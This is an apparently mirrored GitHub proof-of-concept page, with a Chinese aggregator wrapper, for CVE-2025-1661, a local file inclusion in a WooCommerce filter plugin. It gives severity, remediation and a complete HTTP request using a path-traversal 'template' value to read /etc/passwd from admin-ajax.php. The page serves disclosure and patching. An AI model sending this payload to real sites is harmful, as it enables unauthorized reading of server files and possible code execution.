POC详情: abd584cc2b3973d0d330383055e68a12cde8d6f4

来源
https://github.com/shahwarshah/CVE-2025-1661
关联漏洞
标题: WordPress plugin HUSKY Products Filter Professional for WooCommerce 路径遍历漏洞 (CVE-2025-1661)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin HUSKY Products Filter Professional for WooCommerce 1.3.6.5及之前版本存在路径遍历漏洞,该漏洞源于通过woof_text_search AJAX操作的template参数
描述
HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI)
介绍
# CVE-2025-1661 - Unauthenticated Local File Inclusion (LFI) in HUSKY – Products Filter Professional for WooCommerce

## Description

The **HUSKY – Products Filter Professional for WooCommerce** plugin for WordPress is vulnerable to **Local File Inclusion (LFI)** in all versions up to and including **1.3.6.5** via the `template` parameter of the `woof_text_search` AJAX action. 

This allows **unauthenticated attackers** to include and execute arbitrary files on the server, potentially leading to:

- **Bypassing access controls**
- **Extracting sensitive data**
- **Remote Code Execution (RCE)** if certain conditions are met (e.g., upload of "safe" file types)

## Severity: **Critical**

- **CVSS Score:** 9.8 (**Critical**) 
- **CWE ID:** CWE-22 (Path Traversal)
- **EPS Score:** 0.00061

## Affected Versions

- **Vulnerable:** `<= 1.3.6.5`
- **Patched Version:** `1.3.6.6`

## Remediation

Update to version **1.3.6.6** or a newer patched version.

---

## Proof of Concept (PoC)

### Steps to Reproduce

1. Visit the target website.
2. Capture the request using **Burp Suite**.
3. Modify the request method to **POST** and add the following payload:

```http
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

action=woof_text_search&
```
![IntercomVulnChecker Screenshot](lfi.png)
4. If successful, the server will return the contents of `/etc/passwd`.
5. This can be used to extract other sensitive files from the server.

---

## References

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter/husky-products-filter-professional-for-woocommerce-1365-unauthenticated-local-file-inclusion)
- [WordPress Plugin Code](https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text/index.php)
- [CVE Report](https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve)

---



## Disclaimer

This PoC is for **educational and research purposes only**. Unauthorized testing against systems without permission is illegal and unethical. Always seek **explicit authorization** before conducting any security testing.
文件快照

 [4.0K]  /data/pocs/abd584cc2b3973d0d330383055e68a12cde8d6f4
├── [283K]  lfi.png
└── [2.7K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。